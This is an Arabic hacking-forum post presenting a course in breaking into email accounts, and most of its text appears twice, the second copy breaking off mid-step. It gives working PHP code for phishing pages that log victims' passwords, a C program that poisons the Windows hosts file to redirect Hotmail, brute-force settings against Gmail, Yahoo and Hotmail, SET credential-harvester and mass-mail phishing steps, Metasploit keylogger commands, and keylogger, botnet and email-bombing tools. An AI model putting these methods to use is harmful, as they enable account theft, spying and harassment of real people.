super_haker2002
03-03-2014, 09:37 PM
http://img.dev-point.com/imgcache/2014/02/402698.jpg (http://www.0zz0.com)
موضوعنا تعبر دورة شامله للتعرف على اهم طرق اختراق الايميلات اهداء الى جميع اعضاء المنتدى
السلام عليكم ورحمة الله وبركاته الهدف من االموضوع ليس الشرح التفصيلى
والتطبيق الاعمى مع العلم ان الموضوعات منتشره على شبكة الانترنت لكن الهدف هو الفهم والفهرسة
بمعنى اصح ان (اننا نتحدث عن الفكرة وترك التطوير والتفاعل لك واستغلال الفهم وتطويرك لها هو اهم شى
بمعنى انك لديك الفدرة على استغلال وتطوير طرق افضل بجمع بين الاساليب المختلفه
مثالا ان تستخدم الباك تراك بجانب
برامج الويندوز العادية فى الخداع والتلغيم بحيث تجمع
بين الافكار وتقوم بتطوير ما هو افضل وليس انا اعطيك
((ووجهة نظرى ان التطوير يبداء بفكرة بسيطة وينتهى اللى افــــاق واسعة لا حدود لها ))
الطرق العادية باستخدام الويندوز
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
اولا الاختراق من خلال الصفحات المزوره
وتختلف الطرق ولكن الهدف واحد هو الحصول على الباسورد من خلال تسجيل الضحيه (اى كل الطرق تودى الى رومــأ )
وتنقسم الى
1_عمل صفحة مزوره بدون برنامج
2-صفحات مزوره جاهز على شبكة الانترانت موجود بكثرة(هو عبارة عن سكريبت بيه مواقع صفحات مزوره للمواقع التواصل الاجتماعية وغيرها )
3- عمل صفحة مزوره من خلال برنامج والبرامج موجوده من العصر الحجرى مثال على ذلك
Login Spooferو Bazooka
ا-عمل صفحة مزوره بدون برنامج
والفكرة هى التلاعب بصفحة ورفعها على استـضافة (باختصار)
التفصيل
اولا تقوم بفتحة مفكرة وتكب الكود التالى
<?php
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
$redirect = "ضع هنا رابط الموقع الحقيحقي";
header("Location:$redirect");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
[PHP/]
وبعدين
وبعدين
Php تقوم بحفظه باى اسم شرط امتد اد
ليكن
Next.php
بعدين
عمل مفكرة اخرى باسم
Pass.txt
وبعدين بتنزل الصفحة المطلوب عمل نسخة مطبقة مزوره لها لتكن
Facebook
بعد التنزيل تحفظ الصفحة وتقوم بتعديل عليه من خلال فتح بواسطة مفكرة او ورد باد
اولا نبحث عن كلمة
get ونستبدلها بكلمة post
ثانيا نبحث عن كلمة
Next.php التى يلها اللينك الموقع الاساسى ونسبتدلها Action
ويتم التعديل للاتكون كلاتى
[php]"get" action="Next.php"[PHP/]
بعدين رفع على موقع استضافة مجانيه وللمعرفة باسورد اى حد دخل على الصفحة هتقوم بفتح مسار
Pass .txt
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
ب-نفس الطريفة بس فكرة تانى
بعد تحميل الصفحة نحذف سكريبات اللى مش مهمه
وبعدين نعمل ملف ليكن اسمو
Pass
ونعمل بداخله ملفين
الاول بى اتش بى ده لنقل المعلومات من صفحة اتش تى ا مال
Pass.php وده الكود يتم حقظها بامتدد ليكن اسمو
[PHP]
html>>
<head>
<title> Man oF Impossple</title>
<head>
<body>
<?php
$_var="E-mail: ".$_post["pass"]."pass: ".$post["email"]
$_hand=fopen("pass.txt"."a")
fwrite($_hand.$_var);
fclose($_hand);
?>
</html>
والثانى ملف يتم تخزين الباسورد فيه
ليكن
Pass.txt
ويتم التعديل على الصفحة كلاتى
http://www13.0zz0.com/2014/03/03/08/885626671.png
(http://www.0zz0.com)
خد بالك دى اهم معلومة المتغير الذى سوف يحفظ فيه الاسم
http://www13.0zz0.com/2014/03/03/08/511131470.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
2- عن طريقة التخمين
وفى وجهة نظرى المتواضعه انها طريقة عقيمــه ليس لها اهمـية لكن سنتاولها باختصار
التخمين (عند اختراق لاايميلات وليس التخمين على المواقغ)
هو عبارة عن ادة او برنامج يقوم بتجريب قائمة من الباسوردات ولابميلات (باسورد ليست وايميل ليست)
كل ما نفعله هو وضع الايميل المراد التخمين ووضع قائمة باسوردات المحتمل ان يضعها الضحيه
مثال
ارقام تليفونات اسم او عنوان او كناية الضحيه يقوم البرنامج بتجريب حتى يصل اللى الباسورد الصحيه
مثال على الباسورد ليست والايميل ليست مثالا للتخمين على عدد من الايميلات
http://www13.0zz0.com/2014/03/03/08/362062292.png (http://www.0zz0.com)
ومن اهم هذا الادوات او البرامج
(brute force)
مثال للتخمين كما فى الصورة
http://www13.0zz0.com/2014/03/03/08/284046761.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
3-عن طريقة سحب الباسوردات الموجود فى المتصفحات
وهناك برامج وطرق كثير
برنامج
Webbrowserpassview
(البرنامج والفكرة مطروح لستكمال الموضوع فقط)
والبرنامج مش محتاج شرح بس مشكلة البرنامج انك لزم تحطو على جهاز الضحيه يعنى
هو يسجل مع نفسو(طرحى للفكرة من باب العلم فقط وانا برى من من يجربها من باب التجسس على جيرانه او اخواتها اوشخص فريبها ليس لديه خبرة والمسلمين كافة اللهم بلغت اللهم فأشهد انى برىْ
مثال توضيحى
http://www13.0zz0.com/2014/03/03/08/221004525.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
4-برامج الكاى لوجر
اولا ما هو الكاى لوجر
هو برنامج اختراق يقوم بتسجيل بيانات الدخول المختلفه للضحيه وتسجيل مع يقوم بكتابتها عند فتحه للسيرفر ويرسله للمخترق .
يوصل التبليع للمخترق بطرق مختلفة منها الكاى لوجر لذ يرسل على الايميل
والاخر على قاعدة بيانات تسجيل يتم رفعها على استضافة تكون ملحقها مع الكاى لوجر وهناك بعض الانواع تشمل الاثنين معــا
مثال على النوع الاول برنامج البرنامج بسيط مش محتاج شرح
Emissar keylogger
1-ايميلك اللى هيوصل عليه التبليغ
2-الباسورد
3-اختبار التبليغ
-اسم السيرفر والباقى عبارةالخصائص 6- ورسالة التى تظهر فتح الضيحه السيرفر اذا ارد ذلك
http://www13.0zz0.com/2014/03/03/09/908586845.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
النوع الثانى من الكاى لوجر من خلال قاعدة بيانات تسجيل ترفع على استضافة
وكم قولنا فى السابق يكون مرفق مع البرنامج اقعدة البيانات تقوم برفع واخد العنوان او اللينك
1-لينك الصفحة
2-فى حال تريد دمج السيرفر
3-تغير ايقونة السيرفر
مثال على ذلك النوع برنامج
iStealer 6.3 Legends
http://www13.0zz0.com/2014/03/03/09/602127230.png (http://www.0zz0.com)
النوع الثالث
ممكن على الايميل او على على قاعدة بيانات
http://www13.0zz0.com/2014/03/03/09/510493014.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
5-عن طريقة تزييف الدومينات فى جهاز الضحيه
وهى عن طريقة التلاعب بالدومين فى جهاز الضحيه اى عند دخول على الموقع الاساسى يقوم بنقلها مباشرة اللى الموقع المزوز بحيث لا يشعر الضحيه ذلك من خلال ادة تغير الهوست من جهاز الضحية
ادة من برمجة
الاح شــاجع
والامانة العلمية تطلب انا اذكر اسم المبرمج
يتم تصيميمها بـلغة سى بلس بلس
Microsoft Visual C++ 6.0
اولا تقتح البرنامج
وتختار
File
ثم
New
ثم
File
وبعدين
Cc++ source file
وتختار اسم بعدين تحدد مكان الحفظ
كود الادة
مثال الادة على الهوتميل
#include<stdio.h>
void main(){
FILE *f;
f=fopen("C:\\WINDOWS\\system32\\drivers\\etc\\hosts","a");
fprintf(f,"\n الاى بى بتاعكwww.hotmail.com\nالاى بى بتاعكhotmail.com");
fclose(f);
//programmed by shaja
}
طريقة عمل لادة
وده المسار اللى بتقوم بتغيرو الادة
مسار الهوست ده بيكون السبب فى انخداع الضحية
\C:\ wINDOWS\system32\drivers\etc
hosts فى ملف الهوست
127.0.0.1 localhost
بيظهر تحتو مواقع اخر مثالا
192.168.73.18.155 www.hotmail.com
?
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
ألطريقة السادسة من خلال البوت نت الذى يدعم الكاى لوجر
طبعا بعد عمل السيرفر بوت نت وارسالها للضحية وفتح الضحيه له سيصل التلبليغ وكل ما عليك هو تحديد الضحيه وضغط علامة (صح) عليه شرحى
وسنطرح مثال بسيطة هو البوت نت
VertexNet
طبعا ان عندى بوت جاهز دى صورة صفحة الدخول
http://www13.0zz0.com/2014/03/03/09/861913455.png (http://www.0zz0.com)
بعد الدخول سنتعرف على خواص البوت وما يهمنا هو الامرين التاليين الكاى لوجر وكيفية تشغيلها
http://www13.0zz0.com/2014/03/03/09/532202806.png (http://www.0zz0.com)
وامر سحب بيانات الت قام الكاى لوجر بتسجيلها
http://www13.0zz0.com/2014/03/03/09/315380708.png (http://www.0zz0.com)
لارسال الامر True طبعا بعد الاختراق ما عليك الا انك تكتب الامر
http://www13.0zz0.com/2014/03/03/09/403370117.png (http://www.0zz0.com)
وتسحب بيانات الدخول
http://www13.0zz0.com/2014/03/03/09/628707064.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
عارف انك تعبت من قراة الموضوع ههههه لكن هى تعتبر موسعة ودورة كامل
تابع معايه
اخر طريقة
وهذا الطريقة لا تعتبر طريقة اخترق وهى طريقة تعتمد على اغرق الايميل بكم هائلة من الرسائل التى تجعل الضحيه
لا يستطيع فتح صندوق الرسائل وقد تودى فى بعض الاحيان الى غلق الايميل وتعليقه خين تصل الرسائل لعد معين
البرنامج المستخدم +اثبات فعالية من جهازى
GTMailer SMS Bomb
http://www13.0zz0.com/2014/03/03/09/985586011.png (http://www.0zz0.com)
النتيجة
http://www13.0zz0.com/2014/03/03/09/787667044.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
الجزء الثانى الاختراق من خلال الباك تراك
هدفى فى ذكر الطرق شى واحد فقط قعالية كل طريقة لا غير اما التوضيح فستجدونا الشرح كل طريق بتفصيل اما فى اليوتيوب او البركة فى اعضاء المنتدى
الطريقة الاولى
الـتخمين
xhydra بـٌواسطه أدآه
نــُدخل بــُآلمــُوضوع بــُدون مــُقدمآت
Gmailالــُتطبيق ليــُكون عــُلى الــ ُ
xhydra نــُفتح ادآه
بــُعد فــُتح الادآه
نعدل الاعــُدآدادت كلاتى
Target
Single target > smtp.gmail.com
port > 465
Protocol > smtp
Password
Username > ايميل الضحية
Password List > اختر ملف الي فيه الباسوردات(سوف ادرجه في نهآية الموضوع)
try Login as password خلي علآمه صح على >
start
start ضغط على كلمه
وننتضر لحين ينتهي التخمين واضهار باسورد الدخول
ولو كنت تريد التخمين على الياهو
نفس الاعدادات فقط غير
Single target > smtp.gmail.com
الى
Single target > smtp.yahoo.com
وأذآ كآن Hotmail
نغير البورت
الى
port > 587
ونغير
Single target > smtp.live.com
ملف الباسورد ليست
[ غير فعـــاله بنسبة كبيره]
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
الطريقة الثانية
عن طريقة صفحة مزوره مثالا على الفيس
اولا نفتح الادة
Set
طبعا اول ما تشغلها رح يظهر لك الواجهة الرئيسية للاداة ومنها الخيرات لبدء العمل
اختار الخيار الثاني من القائمة
W e b s i t e Attack Vectors
ومن ثم نختار الخيار الثالث من الخيارات المتوفرة
Credential Harvester Attack Method
الان نختار الخيار الثاني وهو :
Site Cloner
ونقوم بادخال مسار الموقع ويجب ان يكون هنالك مكان لتسجيل الدخول في الصفحة المحددة
مثلا فيسبوك بمكنك تسجيل الدخول من الصفحة الرئيسية
www.facebook.com
اما ياهوو فلا يمكنك لذلك نأخذ رابط الصفحة التي تستخدم للتسجيل
https://login.yahoo.com/config/login
ونفس العملية مع جيميل
https://www.google.com/accounts/ServiceLogin
الان نكمل الشرح بعد ادخال الرابط لصفحة التسجيل نقوم بالضغظ على انتر لتبدأ عملية الانشاء
للأستمرار اظغط زر انتر
هنا الاداة انتهت من عملها وتخبرك ان الصفحة المزورة موجوده على ايبي جهازك خلف البورت 80 (بورت المتصفح)
كل ما عليك فعله هو فتح البورت 80 في الراوتر ونسخ الأيبي الخارجي حقك ومن ثم عمل توهيم باستخدام موقع
http://tinyurl.com/
وهذا الموقع جيد ايظا يعطيك اسم دومين للرابط
http://www.dot.tk/en/index.html?lang=en
لايهام وخداع الضحيةسارها
[ فـــــــعاله بنسبة 100% ]
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
[PHP]الطريقة الثالثة
استغلال اداة [ msfpro ] [ + ] وسحب الـ [keylogger ]
بنستخدم سكريبت معين
دور طبعا على السكريبت هتلاقيه
تابع الاتي
msfpro
واضغط على
Enter
use auxiliary/server/capture/http_javascript_keylogger
وبعدين
[ Enter ]
show options
وبعدين
Enter
[ run ]
واضغط على
[ Enter ]
[ تمام دلوقتى انسخ الايبي ونعدل على السكريت
غير > xxxx الى الايبي حفكـ
النتيجه
يقوم بستخرج اليوزرات والباسودات
[PHP/]
[ فـــــــعاله ]
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
الطريقة الرابعة
فتح ادة
set
طبعا اول ما تشغلها سوف يظهر لك الواجهة الرئيسية للاداة ومنها الخيرات لبدء العمل
اختار الخيار الثاني من القائمة
ااو غتح الادة سثغ مباشر
نختار5
Mass Mailer Attack
بعدين1
Use a GMAIL Account for your email attack.
بعدين هتظهر
Enter who you want to send email to
To ايميل الضحية
Enter your GMAIL email address: الايميل
Enter your password for gmail :باسورد:
Do you want to flag this message/s as high priority? yes or no: Yes
Website Attack Vectors
وبعدين
3. Credential Harvester Attack Method
بعدين
1. Web Templates
بعدين بتختار اللى عايزو سوا تويتر او فيس او هوت ميل
وبعدين انتر
وتنتظر فتخ الضخيه الرسالة وتسجيل البيانات
اهم جزء
لزم تظهر دى دليل نجاح الارسالة
SET has finished sending the emails.
ملحوظة وضع لينك الصفحة المزوره فى الرسالة
طريقة ليس لها اهمية فى نظرى المتواضع كانك ارسالة رسالة صفحة مزوه لشخص
لكن بدل انا تستخدم الايميل مباشر استخدم الباك تراك
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
[PHP]
الطريقة السادس
سحب الايميلات على دومين [ + ] [ Back Track ]
تابع الاتي
[ msfconsole ]
بعدين
[ Enter ]
[ use gather/search_email_collector ]
وبعدين
[ Enter ]
[ set DOMAIN hotmail.com ]
وبعدين
[ Enter ]
[ ملاحظه غير الدومين الي تبيه ]
[ النتيجه ]
[/PHPCODE]
[هى مجرد طريقة للسحب وليس لها اهمية تم وضعها لاستكامل فثط ]
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
دورتى للبوت نت على قناتى
http://www.youtube.com/playlist?list=PLwRnBMP4XLUz4a0M0ZmXHAzp3OPOed28W
+ مكتبة الدينيه الشامله ستجدها ايضا فى القناة اسف على اى اخطاء املائية
وان عجبك الموضوع اترك بصمتك بتقيم او شكرا
موضوعنا تعبر دورة شامله للتعرف على اهم طرق اختراق الايميلات اهداء الى جميع اعضاء المنتدى
السلام عليكم ورحمة الله وبركاته الهدف من االموضوع ليس الشرح التفصيلى
والتطبيق الاعمى مع العلم ان الموضوعات منتشره على شبكة الانترنت لكن الهدف هو الفهم والفهرسة
بمعنى اصح ان (اننا نتحدث عن الفكرة وترك التطوير والتفاعل لك واستغلال الفهم وتطويرك لها هو اهم شى
بمعنى انك لديك الفدرة على استغلال وتطوير طرق افضل بجمع بين الاساليب المختلفه
مثالا ان تستخدم الباك تراك بجانب
برامج الويندوز العادية فى الخداع والتلغيم بحيث تجمع
بين الافكار وتقوم بتطوير ما هو افضل وليس انا اعطيك
((ووجهة نظرى ان التطوير يبداء بفكرة بسيطة وينتهى اللى افــــاق واسعة لا حدود لها ))
الطرق العادية باستخدام الويندوز
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
اولا الاختراق من خلال الصفحات المزوره
وتختلف الطرق ولكن الهدف واحد هو الحصول على الباسورد من خلال تسجيل الضحيه (اى كل الطرق تودى الى رومــأ )
وتنقسم الى
1_عمل صفحة مزوره بدون برنامج
2-صفحات مزوره جاهز على شبكة الانترانت موجود بكثرة(هو عبارة عن سكريبت بيه مواقع صفحات مزوره للمواقع التواصل الاجتماعية وغيرها )
3- عمل صفحة مزوره من خلال برنامج والبرامج موجوده من العصر الحجرى مثال على ذلك
Login Spooferو Bazooka
ا-عمل صفحة مزوره بدون برنامج
والفكرة هى التلاعب بصفحة ورفعها على استـضافة (باختصار)
التفصيل
اولا تقوم بفتحة مفكرة وتكب الكود التالى
<?php
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
$redirect = "ضع هنا رابط الموقع الحقيحقي";
header("Location:$redirect");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
[PHP/]
وبعدين
وبعدين
Php تقوم بحفظه باى اسم شرط امتد اد
ليكن
Next.php
بعدين
عمل مفكرة اخرى باسم
Pass.txt
وبعدين بتنزل الصفحة المطلوب عمل نسخة مطبقة مزوره لها لتكن
بعد التنزيل تحفظ الصفحة وتقوم بتعديل عليه من خلال فتح بواسطة مفكرة او ورد باد
اولا نبحث عن كلمة
get ونستبدلها بكلمة post
ثانيا نبحث عن كلمة
Next.php التى يلها اللينك الموقع الاساسى ونسبتدلها Action
ويتم التعديل للاتكون كلاتى
[php]"get" action="Next.php"[PHP/]
بعدين رفع على موقع استضافة مجانيه وللمعرفة باسورد اى حد دخل على الصفحة هتقوم بفتح مسار
Pass .txt
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
ب-نفس الطريفة بس فكرة تانى
بعد تحميل الصفحة نحذف سكريبات اللى مش مهمه
وبعدين نعمل ملف ليكن اسمو
Pass
ونعمل بداخله ملفين
الاول بى اتش بى ده لنقل المعلومات من صفحة اتش تى ا مال
Pass.php وده الكود يتم حقظها بامتدد ليكن اسمو
[PHP]
html>>
<head>
<title> Man oF Impossple</title>
<head>
<body>
<?php
$_var="E-mail: ".$_post["pass"]."pass: ".$post["email"]
$_hand=fopen("pass.txt"."a")
fwrite($_hand.$_var);
fclose($_hand);
?>
</html>
والثانى ملف يتم تخزين الباسورد فيه
ليكن
Pass.txt
ويتم التعديل على الصفحة كلاتى
http://www13.0zz0.com/2014/03/03/08/885626671.png
(http://www.0zz0.com)
خد بالك دى اهم معلومة المتغير الذى سوف يحفظ فيه الاسم
http://www13.0zz0.com/2014/03/03/08/511131470.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
2- عن طريقة التخمين
وفى وجهة نظرى المتواضعه انها طريقة عقيمــه ليس لها اهمـية لكن سنتاولها باختصار
التخمين (عند اختراق لاايميلات وليس التخمين على المواقغ)
هو عبارة عن ادة او برنامج يقوم بتجريب قائمة من الباسوردات ولابميلات (باسورد ليست وايميل ليست)
كل ما نفعله هو وضع الايميل المراد التخمين ووضع قائمة باسوردات المحتمل ان يضعها الضحيه
مثال
ارقام تليفونات اسم او عنوان او كناية الضحيه يقوم البرنامج بتجريب حتى يصل اللى الباسورد الصحيه
مثال على الباسورد ليست والايميل ليست مثالا للتخمين على عدد من الايميلات
http://www13.0zz0.com/2014/03/03/08/362062292.png (http://www.0zz0.com)
ومن اهم هذا الادوات او البرامج
(brute force)
مثال للتخمين كما فى الصورة
http://www13.0zz0.com/2014/03/03/08/284046761.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
3-عن طريقة سحب الباسوردات الموجود فى المتصفحات
وهناك برامج وطرق كثير
برنامج
Webbrowserpassview
(البرنامج والفكرة مطروح لستكمال الموضوع فقط)
والبرنامج مش محتاج شرح بس مشكلة البرنامج انك لزم تحطو على جهاز الضحيه يعنى
هو يسجل مع نفسو(طرحى للفكرة من باب العلم فقط وانا برى من من يجربها من باب التجسس على جيرانه او اخواتها اوشخص فريبها ليس لديه خبرة والمسلمين كافة اللهم بلغت اللهم فأشهد انى برىْ
مثال توضيحى
http://www13.0zz0.com/2014/03/03/08/221004525.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
4-برامج الكاى لوجر
اولا ما هو الكاى لوجر
هو برنامج اختراق يقوم بتسجيل بيانات الدخول المختلفه للضحيه وتسجيل مع يقوم بكتابتها عند فتحه للسيرفر ويرسله للمخترق .
يوصل التبليع للمخترق بطرق مختلفة منها الكاى لوجر لذ يرسل على الايميل
والاخر على قاعدة بيانات تسجيل يتم رفعها على استضافة تكون ملحقها مع الكاى لوجر وهناك بعض الانواع تشمل الاثنين معــا
مثال على النوع الاول برنامج البرنامج بسيط مش محتاج شرح
Emissar keylogger
1-ايميلك اللى هيوصل عليه التبليغ
2-الباسورد
3-اختبار التبليغ
-اسم السيرفر والباقى عبارةالخصائص 6- ورسالة التى تظهر فتح الضيحه السيرفر اذا ارد ذلك
http://www13.0zz0.com/2014/03/03/09/908586845.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
النوع الثانى من الكاى لوجر من خلال قاعدة بيانات تسجيل ترفع على استضافة
وكم قولنا فى السابق يكون مرفق مع البرنامج اقعدة البيانات تقوم برفع واخد العنوان او اللينك
1-لينك الصفحة
2-فى حال تريد دمج السيرفر
3-تغير ايقونة السيرفر
مثال على ذلك النوع برنامج
iStealer 6.3 Legends
http://www13.0zz0.com/2014/03/03/09/602127230.png (http://www.0zz0.com)
النوع الثالث
ممكن على الايميل او على على قاعدة بيانات
http://www13.0zz0.com/2014/03/03/09/510493014.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
5-عن طريقة تزييف الدومينات فى جهاز الضحيه
وهى عن طريقة التلاعب بالدومين فى جهاز الضحيه اى عند دخول على الموقع الاساسى يقوم بنقلها مباشرة اللى الموقع المزوز بحيث لا يشعر الضحيه ذلك من خلال ادة تغير الهوست من جهاز الضحية
ادة من برمجة
الاح شــاجع
والامانة العلمية تطلب انا اذكر اسم المبرمج
يتم تصيميمها بـلغة سى بلس بلس
Microsoft Visual C++ 6.0
اولا تقتح البرنامج
وتختار
File
ثم
New
ثم
File
وبعدين
Cc++ source file
وتختار اسم بعدين تحدد مكان الحفظ
كود الادة
مثال الادة على الهوتميل
#include<stdio.h>
void main(){
FILE *f;
f=fopen("C:\\WINDOWS\\system32\\drivers\\etc\\hosts","a");
fprintf(f,"\n الاى بى بتاعكwww.hotmail.com\nالاى بى بتاعكhotmail.com");
fclose(f);
//programmed by shaja
}
طريقة عمل لادة
وده المسار اللى بتقوم بتغيرو الادة
مسار الهوست ده بيكون السبب فى انخداع الضحية
\C:\ wINDOWS\system32\drivers\etc
hosts فى ملف الهوست
127.0.0.1 localhost
بيظهر تحتو مواقع اخر مثالا
192.168.73.18.155 www.hotmail.com
?
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
ألطريقة السادسة من خلال البوت نت الذى يدعم الكاى لوجر
طبعا بعد عمل السيرفر بوت نت وارسالها للضحية وفتح الضحيه له سيصل التلبليغ وكل ما عليك هو تحديد الضحيه وضغط علامة (صح) عليه شرحى
وسنطرح مثال بسيطة هو البوت نت
VertexNet
طبعا ان عندى بوت جاهز دى صورة صفحة الدخول
http://www13.0zz0.com/2014/03/03/09/861913455.png (http://www.0zz0.com)
بعد الدخول سنتعرف على خواص البوت وما يهمنا هو الامرين التاليين الكاى لوجر وكيفية تشغيلها
http://www13.0zz0.com/2014/03/03/09/532202806.png (http://www.0zz0.com)
وامر سحب بيانات الت قام الكاى لوجر بتسجيلها
http://www13.0zz0.com/2014/03/03/09/315380708.png (http://www.0zz0.com)
لارسال الامر True طبعا بعد الاختراق ما عليك الا انك تكتب الامر
http://www13.0zz0.com/2014/03/03/09/403370117.png (http://www.0zz0.com)
وتسحب بيانات الدخول
http://www13.0zz0.com/2014/03/03/09/628707064.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
عارف انك تعبت من قراة الموضوع ههههه لكن هى تعتبر موسعة ودورة كامل
تابع معايه
اخر طريقة
وهذا الطريقة لا تعتبر طريقة اخترق وهى طريقة تعتمد على اغرق الايميل بكم هائلة من الرسائل التى تجعل الضحيه
لا يستطيع فتح صندوق الرسائل وقد تودى فى بعض الاحيان الى غلق الايميل وتعليقه خين تصل الرسائل لعد معين
البرنامج المستخدم +اثبات فعالية من جهازى
GTMailer SMS Bomb
http://www13.0zz0.com/2014/03/03/09/985586011.png (http://www.0zz0.com)
النتيجة
http://www13.0zz0.com/2014/03/03/09/787667044.png (http://www.0zz0.com)
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
الجزء الثانى الاختراق من خلال الباك تراك
هدفى فى ذكر الطرق شى واحد فقط قعالية كل طريقة لا غير اما التوضيح فستجدونا الشرح كل طريق بتفصيل اما فى اليوتيوب او البركة فى اعضاء المنتدى
الطريقة الاولى
الـتخمين
xhydra بـٌواسطه أدآه
نــُدخل بــُآلمــُوضوع بــُدون مــُقدمآت
Gmailالــُتطبيق ليــُكون عــُلى الــ ُ
xhydra نــُفتح ادآه
بــُعد فــُتح الادآه
نعدل الاعــُدآدادت كلاتى
Target
Single target > smtp.gmail.com
port > 465
Protocol > smtp
Password
Username > ايميل الضحية
Password List > اختر ملف الي فيه الباسوردات(سوف ادرجه في نهآية الموضوع)
try Login as password خلي علآمه صح على >
start
start ضغط على كلمه
وننتضر لحين ينتهي التخمين واضهار باسورد الدخول
ولو كنت تريد التخمين على الياهو
نفس الاعدادات فقط غير
Single target > smtp.gmail.com
الى
Single target > smtp.yahoo.com
وأذآ كآن Hotmail
نغير البورت
الى
port > 587
ونغير
Single target > smtp.live.com
ملف الباسورد ليست
[ غير فعـــاله بنسبة كبيره]
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
الطريقة الثانية
عن طريقة صفحة مزوره مثالا على الفيس
اولا نفتح الادة
Set
طبعا اول ما تشغلها رح يظهر لك الواجهة الرئيسية للاداة ومنها الخيرات لبدء العمل
اختار الخيار الثاني من القائمة
W e b s i t e Attack Vectors
ومن ثم نختار الخيار الثالث من الخيارات المتوفرة
Credential Harvester Attack Method
الان نختار الخيار الثاني وهو :
Site Cloner
ونقوم بادخال مسار الموقع ويجب ان يكون هنالك مكان لتسجيل الدخول في الصفحة المحددة
مثلا فيسبوك بمكنك تسجيل الدخول من الصفحة الرئيسية
www.facebook.com
اما ياهوو فلا يمكنك لذلك نأخذ رابط الصفحة التي تستخدم للتسجيل
https://login.yahoo.com/config/login
ونفس العملية مع جيميل
https://www.google.com/accounts/ServiceLogin
الان نكمل الشرح بعد ادخال الرابط لصفحة التسجيل نقوم بالضغظ على انتر لتبدأ عملية الانشاء
للأستمرار اظغط زر انتر
هنا الاداة انتهت من عملها وتخبرك ان الصفحة المزورة موجوده على ايبي جهازك خلف البورت 80 (بورت المتصفح)
كل ما عليك فعله هو فتح البورت 80 في الراوتر ونسخ الأيبي الخارجي حقك ومن ثم عمل توهيم باستخدام موقع
http://tinyurl.com/
وهذا الموقع جيد ايظا يعطيك اسم دومين للرابط
http://www.dot.tk/en/index.html?lang=en
لايهام وخداع الضحيةسارها
[ فـــــــعاله بنسبة 100% ]
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
[PHP]الطريقة الثالثة
استغلال اداة [ msfpro ] [ + ] وسحب الـ [keylogger ]
بنستخدم سكريبت معين
دور طبعا على السكريبت هتلاقيه
تابع الاتي
msfpro
واضغط على
Enter
use auxiliary/server/capture/http_javascript_keylogger
وبعدين
[ Enter ]
show options
وبعدين
Enter
[ run ]
واضغط على
[ Enter ]
[ تمام دلوقتى انسخ الايبي ونعدل على السكريت
غير > xxxx الى الايبي حفكـ
النتيجه
يقوم بستخرج اليوزرات والباسودات
[PHP/]
[ فـــــــعاله ]
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
الطريقة الرابعة
فتح ادة
set
طبعا اول ما تشغلها سوف يظهر لك الواجهة الرئيسية للاداة ومنها الخيرات لبدء العمل
اختار الخيار الثاني من القائمة
ااو غتح الادة سثغ مباشر
نختار5
Mass Mailer Attack
بعدين1
Use a GMAIL Account for your email attack.
بعدين هتظهر
Enter who you want to send email to
To ايميل الضحية
Enter your GMAIL email address: الايميل
Enter your password for gmail :باسورد:
Do you want to flag this message/s as high priority? yes or no: Yes
Website Attack Vectors
وبعدين
3. Credential Harvester Attack Method
بعدين
1. Web Templates
بعدين بتختار اللى عايزو سوا تويتر او فيس او هوت ميل
وبعدين انتر
وتنتظر فتخ الضخيه الرسالة وتسجيل البيانات
اهم جزء
لزم تظهر دى دليل نجاح الارسالة
SET has finished sending the emails.
ملحوظة وضع لينك الصفحة المزوره فى الرسالة
طريقة ليس لها اهمية فى نظرى المتواضع كانك ارسالة رسالة صفحة مزوه لشخص
لكن بدل انا تستخدم الايميل مباشر استخدم الباك تراك
http://img.dev-point.com/imgcache/2014/02/402700.gif (http://www.0zz0.com)
[PHP]
الطريقة السادس
سحب الايميلات على دومين [ + ] [ Back Track ]
تابع الاتي
[ msfconsole ]
بعدين
[ Enter ]
[ use gather/search_email_collector ]
وبعدين
[ Enter ]
[ set DOMAIN hotmail.com ]
وبعدين
